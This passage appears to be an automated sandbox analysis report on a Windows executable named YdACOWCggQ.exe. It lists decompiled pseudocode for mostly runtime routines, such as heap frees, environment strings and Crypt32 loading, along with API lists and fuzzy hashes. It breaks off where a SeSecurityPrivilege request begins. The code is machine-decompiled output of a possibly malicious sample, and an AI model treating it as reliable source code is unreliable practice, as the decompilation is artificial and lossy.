                                                                            					if(_t6 != 0) {
                                                                            						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
                                                                            						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
                                                                            						_t9[3] = _t6;
                                                                            					}
                                                                            					_t9[1] = 1;
                                                                            					return _t6;
                                                                            				}
                                                                            				return _t5;
                                                                            			}







                                                                            APIs
                                                                              • Part of subcall function 0019FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
                                                                              • Part of subcall function 0019FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A
                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0019E802
                                                                            • GetProcAddress.KERNEL32(001D7350,CryptUnprotectMemory), ref: 0019E812
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                            • API String ID: 2141747552-1753850145
                                                                            • Opcode ID: 22918d76d23c471ff4ed6acca8ec7d8c71e79957bd8d594d9ba4a1e4777e7013
                                                                            • Instruction ID: 58ad2e7a917059580dec1643a72fefd940f834468c28e2529281f16371e3b7ce
                                                                            • Opcode Fuzzy Hash: 22918d76d23c471ff4ed6acca8ec7d8c71e79957bd8d594d9ba4a1e4777e7013
                                                                            • Instruction Fuzzy Hash: D7E012B0900B43ABCB009B78D808F05FAA47B20B00B10C12AF824D3651DBB4D0A0CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E001B7389(signed int* __ecx, signed int __edx) {
                                                                            				signed int _v8;
                                                                            				intOrPtr* _v12;
                                                                            				signed int _v16;
                                                                            				signed int _t28;
                                                                            				signed int _t29;
                                                                            				intOrPtr _t33;
                                                                            				signed int _t37;
                                                                            				signed int _t38;
                                                                            				signed int _t40;
                                                                            				void* _t50;
                                                                            				signed int _t56;
                                                                            				intOrPtr* _t57;
                                                                            				signed int _t68;
                                                                            				signed int _t71;
                                                                            				signed int _t72;
                                                                            				signed int _t74;
                                                                            				signed int _t75;
                                                                            				signed int _t78;
                                                                            				signed int _t80;
                                                                            				signed int* _t81;
                                                                            				signed int _t85;
                                                                            				void* _t86;
                                                                            
                                                                            				_t72 = __edx;
                                                                            				_v12 = __ecx;
                                                                            				_t28 =  *__ecx;
                                                                            				_t81 =  *_t28;
                                                                            				if(_t81 != 0) {
                                                                            					_t29 =  *0x1cd668; // 0x44aa1787
                                                                            					_t56 =  *_t81 ^ _t29;
                                                                            					_t78 = _t81[1] ^ _t29;
                                                                            					_t83 = _t81[2] ^ _t29;
                                                                            					asm("ror edi, cl");
                                                                            					asm("ror esi, cl");
                                                                            					asm("ror ebx, cl");
                                                                            					if(_t78 != _t83) {
                                                                            						L14:
                                                                            						 *_t78 = E001B69A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                                            						_t33 = E001ADB10(_t56);
                                                                            						_t57 = _v12;
                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                                            						_t24 = _t78 + 4; // 0x4
                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E001ADB10(_t24);
                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E001ADB10(_t83);
                                                                            						_t37 = 0;
                                                                            						L15:
                                                                            						return _t37;
                                                                            					}
                                                                            					_t38 = 0x200;
                                                                            					_t85 = _t83 - _t56 >> 2;
                                                                            					if(_t85 <= 0x200) {
                                                                            						_t38 = _t85;
                                                                            					}
                                                                            					_t80 = _t38 + _t85;
                                                                            					if(_t80 == 0) {
                                                                            						_t80 = 0x20;
                                                                            					}
                                                                            					if(_t80 < _t85) {
                                                                            						L9:
                                                                            						_push(4);
                                                                            						_t80 = _t85 + 4;
                                                                            						_push(_t80);
                                                                            						_v8 = E001BAC29(_t56);
                                                                            						_t40 = E001B7A50(0);
                                                                            						_t68 = _v8;
                                                                            						_t86 = _t86 + 0x10;
                                                                            						if(_t68 != 0) {
                                                                            							goto L11;
                                                                            						}
                                                                            						_t37 = _t40 | 0xffffffff;
                                                                            						goto L15;
                                                                            					} else {
                                                                            						_push(4);
                                                                            						_push(_t80);
                                                                            						_v8 = E001BAC29(_t56);
                                                                            						E001B7A50(0);
                                                                            						_t68 = _v8;
                                                                            						_t86 = _t86 + 0x10;
                                                                            						if(_t68 != 0) {
                                                                            							L11:
                                                                            							_t56 = _t68;
                                                                            							_v8 = _t68 + _t85 * 4;
                                                                            							_t83 = _t68 + _t80 * 4;
                                                                            							_t78 = _v8;
                                                                            							_push(0x20);
                                                                            							asm("ror eax, cl");
                                                                            							_t71 = _t78;
                                                                            							_v16 = 0 ^  *0x1cd668;
                                                                            							asm("sbb edx, edx");
                                                                            							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                                            							_v8 = _t74;
                                                                            							if(_t74 == 0) {
                                                                            								goto L14;
                                                                            							}
                                                                            							_t75 = _v16;
                                                                            							_t50 = 0;
                                                                            							do {
                                                                            								_t50 = _t50 + 1;
                                                                            								 *_t71 = _t75;
                                                                            								_t71 = _t71 + 4;
                                                                            							} while (_t50 != _v8);
                                                                            							goto L14;
                                                                            						}
                                                                            						goto L9;
                                                                            					}
                                                                            				}
                                                                            				return _t28 | 0xffffffff;
                                                                            			}

























                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: 180b2503c985550a3a0b2077120fce4bdcb8c33ec3be1566fe9089cbc0fed931
                                                                            • Instruction ID: b0c1ffb2e72323f801b453723b77fa8c921048d7632d0193ce5b3589e2ae70a4
                                                                            • Opcode Fuzzy Hash: 180b2503c985550a3a0b2077120fce4bdcb8c33ec3be1566fe9089cbc0fed931
                                                                            • Instruction Fuzzy Hash: 7F41C036A003049FCB14DF78C881A9EBBF6EF89714B1645A9E519EB391DB31ED01CB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E001BABA6() {
                                                                            				int _v8;
                                                                            				void* __ecx;
                                                                            				void* _t6;
                                                                            				int _t7;
                                                                            				char* _t13;
                                                                            				int _t17;
                                                                            				void* _t19;
                                                                            				char* _t25;
                                                                            				WCHAR* _t27;
                                                                            
                                                                            				_t27 = GetEnvironmentStringsW();
                                                                            				if(_t27 == 0) {
                                                                            					L7:
                                                                            					_t13 = 0;
                                                                            				} else {
                                                                            					_t6 = E001BAB6F(_t27);
                                                                            					_pop(_t19);
                                                                            					_t17 = _t6 - _t27 >> 1;
                                                                            					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                            					_v8 = _t7;
                                                                            					if(_t7 == 0) {
                                                                            						goto L7;
                                                                            					} else {
                                                                            						_t25 = E001B7A8A(_t19, _t7);
                                                                            						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                            							_t13 = 0;
                                                                            						} else {
                                                                            							_t13 = _t25;
                                                                            							_t25 = 0;
                                                                            						}
                                                                            						E001B7A50(_t25);
                                                                            					}
                                                                            				}
                                                                            				if(_t27 != 0) {
                                                                            					FreeEnvironmentStringsW(_t27);
                                                                            				}
                                                                            				return _t13;
                                                                            			}












                                                                            APIs
                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001BABAF
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001BABD2
                                                                              • Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001BABF8
                                                                            • _free.LIBCMT ref: 001BAC0B
                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BAC1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                            • String ID:
                                                                            • API String ID: 336800556-0
                                                                            • Opcode ID: cc15e569f21f05818d7ce12cd86613e46dd2d6f047972b110c2efdef71d9046c
                                                                            • Instruction ID: 5d41209ca65e1941cfbc9a4310657cf6c17047e99ba16552a84fa9beabf4ee95
                                                                            • Opcode Fuzzy Hash: cc15e569f21f05818d7ce12cd86613e46dd2d6f047972b110c2efdef71d9046c
                                                                            • Instruction Fuzzy Hash: B9018F726016157F23211ABA6C8CCFF7E6DDECBBA03690129F904D3241EB71CD4182B2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E001B859A(void* __ecx, void* __edx) {
                                                                            				void* __esi;
                                                                            				intOrPtr _t2;
                                                                            				void* _t4;
                                                                            				void* _t10;
                                                                            				void* _t11;
                                                                            				void* _t13;
                                                                            				void* _t16;
                                                                            				long _t17;
                                                                            
                                                                            				_t11 = __ecx;
                                                                            				_t17 = GetLastError();
                                                                            				_t10 = 0;
                                                                            				_t2 =  *0x1cd6ac; // 0x6
                                                                            				_t20 = _t2 - 0xffffffff;
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					L2:
                                                                            					_t16 = E001B7B1B(_t11, 1, 0x364);
                                                                            					_pop(_t13);
                                                                            					if(_t16 != 0) {
                                                                            						_t4 = E001B9BA9(_t13, _t17, __eflags,  *0x1cd6ac, _t16);
                                                                            						__eflags = _t4;
                                                                            						if(_t4 != 0) {
                                                                            							E001B8388(_t13, _t16, 0x1f0418);
                                                                            							E001B7A50(_t10);
                                                                            							__eflags = _t16;
                                                                            							if(_t16 != 0) {
                                                                            								goto L9;
                                                                            							} else {
                                                                            								goto L8;
                                                                            							}
                                                                            						} else {
                                                                            							_push(_t16);
                                                                            							goto L4;
                                                                            						}
                                                                            					} else {
                                                                            						_push(_t10);
                                                                            						L4:
                                                                            						E001B7A50();
                                                                            						L8:
                                                                            						SetLastError(_t17);
                                                                            					}
                                                                            				} else {
                                                                            					_t16 = E001B9B53(_t11, _t17, _t20, _t2);
                                                                            					if(_t16 != 0) {
                                                                            						L9:
                                                                            						SetLastError(_t17);
                                                                            						_t10 = _t16;
                                                                            					} else {
                                                                            						goto L2;
                                                                            					}
                                                                            				}
                                                                            				return _t10;
                                                                            			}












                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,001B7ED1,001B7B6D,?,001B8544,00000001,00000364,?,001B2E0F,?,?,001D00E0), ref: 001B859F
                                                                            • _free.LIBCMT ref: 001B85D4
                                                                            • _free.LIBCMT ref: 001B85FB
                                                                            • SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8608
                                                                            • SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8611
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free
                                                                            • String ID:
                                                                            • API String ID: 3170660625-0
                                                                            • Opcode ID: 0cea3d216ebc8de3eb61b254a7f090a60ba9aefb8775dbb729d114d0177ca90c
                                                                            • Instruction ID: 5c62da7490255317119339750306ec2e666a2fbd6ef24267f10f7dcc9923f539
                                                                            • Opcode Fuzzy Hash: 0cea3d216ebc8de3eb61b254a7f090a60ba9aefb8775dbb729d114d0177ca90c
                                                                            • Instruction Fuzzy Hash: 3E0128362046006BD31637357C86EEB3A6D9BE0F757360125F909A3293EF75CD02C165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E001A03C7(void* __ecx) {
                                                                            				intOrPtr _v16;
                                                                            				void* __ebp;
                                                                            				int _t16;
                                                                            				void** _t21;
                                                                            				long* _t25;
                                                                            				void* _t28;
                                                                            				void* _t30;
                                                                            				intOrPtr _t31;
                                                                            
                                                                            				_t22 = __ecx;
                                                                            				_push(0xffffffff);
                                                                            				_push(E001C1161);
                                                                            				_push( *[fs:0x0]);
                                                                            				 *[fs:0x0] = _t31;
                                                                            				_t28 = __ecx;
                                                                            				E001A0697(__ecx);
                                                                            				_t25 = 0;
                                                                            				 *((char*)(__ecx + 0x314)) = 1;
                                                                            				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
                                                                            				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
                                                                            					_t21 = _t28 + 4;
                                                                            					do {
                                                                            						E001A04BA(_t22, _t30,  *_t21);
                                                                            						CloseHandle( *_t21);
                                                                            						_t25 = _t25 + 1;
                                                                            						_t21 =  &(_t21[1]);
                                                                            					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
                                                                            				}
                                                                            				DeleteCriticalSection(_t28 + 0x320);
                                                                            				CloseHandle( *(_t28 + 0x318));
                                                                            				_t16 = CloseHandle( *(_t28 + 0x31c));
                                                                            				 *[fs:0x0] = _v16;
                                                                            				return _t16;
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 001A0697: ResetEvent.KERNEL32(?), ref: 001A06A9
                                                                              • Part of subcall function 001A0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001A06BD
                                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001A03FB
                                                                            • CloseHandle.KERNEL32(?,?), ref: 001A0415
                                                                            • DeleteCriticalSection.KERNEL32(?), ref: 001A042E
                                                                            • CloseHandle.KERNEL32(?), ref: 001A043A
                                                                            • CloseHandle.KERNEL32(?), ref: 001A0446
                                                                              • Part of subcall function 001A04BA: WaitForSingleObject.KERNEL32(?,000000FF,001A05D9,?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04C0
                                                                              • Part of subcall function 001A04BA: GetLastError.KERNEL32(?,?,001A064E,?,?,?,?,?,001A0638), ref: 001A04CC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 1868215902-0
                                                                            • Opcode ID: 1d79ff52877ee6c2b46ba49ccc87f778487b62b7aa5a4c608e02ecb68ca51c83
                                                                            • Instruction ID: 0fdd6e722a6af72f0dd05d28a1bd55afbc7d9f8d142c9f0d6d20b3a957edc1d7
                                                                            • Opcode Fuzzy Hash: 1d79ff52877ee6c2b46ba49ccc87f778487b62b7aa5a4c608e02ecb68ca51c83
                                                                            • Instruction Fuzzy Hash: 1A01B172040B04EBC7229F68DC84FC6BFE9FB4E710F00051AF25A92560CBB5A994CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001BB461(intOrPtr* _a4) {
                                                                            				intOrPtr _t6;
                                                                            				intOrPtr* _t21;
                                                                            				void* _t23;
                                                                            				void* _t24;
                                                                            				void* _t25;
                                                                            				void* _t26;
                                                                            				void* _t27;
                                                                            
                                                                            				_t21 = _a4;
                                                                            				if(_t21 != 0) {
                                                                            					_t23 =  *_t21 -  *0x1cdd50; // 0x1cdd44
                                                                            					if(_t23 != 0) {
                                                                            						E001B7A50(_t7);
                                                                            					}
                                                                            					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1cdd54; // 0x1f088c
                                                                            					if(_t24 != 0) {
                                                                            						E001B7A50(_t8);
                                                                            					}
                                                                            					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1cdd58; // 0x1f088c
                                                                            					if(_t25 != 0) {
                                                                            						E001B7A50(_t9);
                                                                            					}
                                                                            					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1cdd80; // 0x1cdd48
                                                                            					if(_t26 != 0) {
                                                                            						E001B7A50(_t10);
                                                                            					}
                                                                            					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                            					_t27 = _t6 -  *0x1cdd84; // 0x1f0890
                                                                            					if(_t27 != 0) {
                                                                            						return E001B7A50(_t6);
                                                                            					}
                                                                            				}
                                                                            				return _t6;
                                                                            			}











                                                                            APIs
                                                                            • _free.LIBCMT ref: 001BB479
                                                                              • Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
                                                                              • Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78
                                                                            • _free.LIBCMT ref: 001BB48B
                                                                            • _free.LIBCMT ref: 001BB49D
                                                                            • _free.LIBCMT ref: 001BB4AF
                                                                            • _free.LIBCMT ref: 001BB4C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 23731e06e0de7724d9d1b3416c04fe19559e93031210dd2cb46756e7ecf7d13e
                                                                            • Instruction ID: 4fe3a53b1a36fc678d94d79ad9ab58b1e31deae2e5a8120a6bba8f3c30f313a4
                                                                            • Opcode Fuzzy Hash: 23731e06e0de7724d9d1b3416c04fe19559e93031210dd2cb46756e7ecf7d13e
                                                                            • Instruction Fuzzy Hash: 8FF01272908200ABC660DBB4F8C6CAAB7D9BB507107585819F04FE7D91D774FDC08654
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E001B75DB(signed int __ecx) {
                                                                            				intOrPtr _t7;
                                                                            
                                                                            				asm("lock xadd [eax], ecx");
                                                                            				if((__ecx | 0xffffffff) == 0) {
                                                                            					_t7 =  *0x1cdd40; // 0xf32588
                                                                            					if(_t7 != 0x1cdb20) {
                                                                            						E001B7A50(_t7);
                                                                            						 *0x1cdd40 = 0x1cdb20;
                                                                            					}
                                                                            				}
                                                                            				E001B7A50( *0x1f0410);
                                                                            				 *0x1f0410 = 0;
                                                                            				E001B7A50( *0x1f0414);
                                                                            				 *0x1f0414 = 0;
                                                                            				E001B7A50( *0x1f0860);
                                                                            				 *0x1f0860 = 0;
                                                                            				E001B7A50( *0x1f0864);
                                                                            				 *0x1f0864 = 0;
                                                                            				return 1;
                                                                            			}





                                                                            APIs
                                                                            • _free.LIBCMT ref: 001B75F9
                                                                              • Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
                                                                              • Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78
                                                                            • _free.LIBCMT ref: 001B760B
                                                                            • _free.LIBCMT ref: 001B761E
                                                                            • _free.LIBCMT ref: 001B762F
                                                                            • _free.LIBCMT ref: 001B7640
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: cfddc715a7dbbadd03bcd7d8fea821b148786bd14ce0f80d3c1a919b5b451a65
                                                                            • Instruction ID: 14f390ee459c85d761761bf87c1adb4ccebd5618cd4579058dbd6d7d78b882a7
                                                                            • Opcode Fuzzy Hash: cfddc715a7dbbadd03bcd7d8fea821b148786bd14ce0f80d3c1a919b5b451a65
                                                                            • Instruction Fuzzy Hash: 34F03AB0D082288B8743AF38BC019BA3BA4B79D71030A1126F11267AF3C7304A81CBC9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                            			E001B6C73(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				void* _v12;
                                                                            				char _v16;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t36;
                                                                            				struct HINSTANCE__* _t37;
                                                                            				struct HINSTANCE__* _t43;
                                                                            				intOrPtr* _t44;
                                                                            				intOrPtr* _t45;
                                                                            				CHAR* _t49;
                                                                            				struct HINSTANCE__* _t50;
                                                                            				void* _t52;
                                                                            				struct HINSTANCE__* _t55;
                                                                            				intOrPtr* _t59;
                                                                            				struct HINSTANCE__* _t64;
                                                                            				intOrPtr _t65;
                                                                            
                                                                            				_t52 = __ecx;
                                                                            				if(_a4 == 2 || _a4 == 1) {
                                                                            					E001BA7B3(_t52);
                                                                            					GetModuleFileNameA(0, 0x1f02b8, 0x104);
                                                                            					_t49 =  *0x1f0868; // 0xf223b8
                                                                            					 *0x1f0870 = 0x1f02b8;
                                                                            					if(_t49 == 0 ||  *_t49 == 0) {
                                                                            						_t49 = 0x1f02b8;
                                                                            					}
                                                                            					_v8 = 0;
                                                                            					_v16 = 0;
                                                                            					E001B6D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                                            					_t64 = E001B6F0C(_v8, _v16, 1);
                                                                            					if(_t64 != 0) {
                                                                            						E001B6D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                            						if(_a4 != 1) {
                                                                            							_v12 = 0;
                                                                            							_push( &_v12);
                                                                            							_t50 = E001BA2CE(_t49, 0, _t64, _t64);
                                                                            							if(_t50 == 0) {
                                                                            								_t59 = _v12;
                                                                            								_t55 = 0;
                                                                            								_t36 = _t59;
                                                                            								if( *_t59 == 0) {
                                                                            									L15:
                                                                            									_t37 = 0;
                                                                            									 *0x1f085c = _t55;
                                                                            									_v12 = 0;
                                                                            									_t50 = 0;
                                                                            									 *0x1f0860 = _t59;
                                                                            									L16:
                                                                            									E001B7A50(_t37);
                                                                            									_v12 = 0;
                                                                            									goto L17;
                                                                            								} else {
                                                                            									goto L14;
                                                                            								}
                                                                            								do {
                                                                            									L14:
                                                                            									_t36 = _t36 + 4;
                                                                            									_t55 =  &(_t55->i);
                                                                            								} while ( *_t36 != 0);
                                                                            								goto L15;
                                                                            							}
                                                                            							_t37 = _v12;
                                                                            							goto L16;
                                                                            						}
                                                                            						 *0x1f085c = _v8 - 1;
                                                                            						_t43 = _t64;
                                                                            						_t64 = 0;
                                                                            						 *0x1f0860 = _t43;
                                                                            						goto L10;
                                                                            					} else {
                                                                            						_t44 = E001B7ECC();
                                                                            						_push(0xc);
                                                                            						_pop(0);
                                                                            						 *_t44 = 0;
                                                                            						L10:
                                                                            						_t50 = 0;
                                                                            						L17:
                                                                            						E001B7A50(_t64);
                                                                            						return _t50;
                                                                            					}
                                                                            				} else {
                                                                            					_t45 = E001B7ECC();
                                                                            					_t65 = 0x16;
                                                                            					 *_t45 = _t65;
                                                                            					E001B7DAB();
                                                                            					return _t65;
                                                                            				}
                                                                            			}






















                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\YdACOWCggQ.exe,00000104), ref: 001B6CB3
                                                                            • _free.LIBCMT ref: 001B6D7E
                                                                            • _free.LIBCMT ref: 001B6D88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$FileModuleName
                                                                            • String ID: C:\Users\user\Desktop\YdACOWCggQ.exe
                                                                            • API String ID: 2506810119-2147345565
                                                                            • Opcode ID: 70dbb44522589780d0f104056b780f07b64544e90bdacc46d94ab7e86be6f8ab
                                                                            • Instruction ID: b475e77a7f239867fa41b5558b946501373845df753e035f1f4b2355cec64a1b
                                                                            • Opcode Fuzzy Hash: 70dbb44522589780d0f104056b780f07b64544e90bdacc46d94ab7e86be6f8ab
                                                                            • Instruction Fuzzy Hash: A53192B1A04218AFCB22DF99DC819EEBBFCEFA9310F144066F84497251D7759E40CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            			E001973B9(void* __ebx, void* __edx, void* __esi) {
                                                                            				void* _t26;
                                                                            				long _t32;
                                                                            				void* _t39;
                                                                            				void* _t42;
                                                                            				intOrPtr _t43;
                                                                            				void* _t52;
                                                                            				void* _t57;
                                                                            				void* _t58;
                                                                            				void* _t61;
                                                                            
                                                                            				_t57 = __esi;
                                                                            				_t52 = __edx;
                                                                            				_t42 = __ebx;
                                                                            				E001AD870(E001C1321, _t61);
                                                                            				E001AD940();
                                                                            				 *((intOrPtr*)(_t61 - 0x20)) = 0;
                                                                            				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
                                                                            				 *((intOrPtr*)(_t61 - 0x18)) = 0;
                                                                            				 *((intOrPtr*)(_t61 - 0x14)) = 0;
                                                                            				 *((char*)(_t61 - 0x10)) = 0;
                                                                            				_t54 =  *((intOrPtr*)(_t61 + 8));
                                                                            				_push(0);
                                                                            				_push(0);
                                                                            				 *((intOrPtr*)(_t61 - 4)) = 0;
                                                                            				_push(_t61 - 0x20);
                                                                            				if(E0019399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
                                                                            					if( *0x1d0042 == 0) {
                                                                            						if(E00197A15(L"SeSecurityPrivilege") != 0) {
                                                                            							 *0x1d0041 = 1;
                                                                            						}
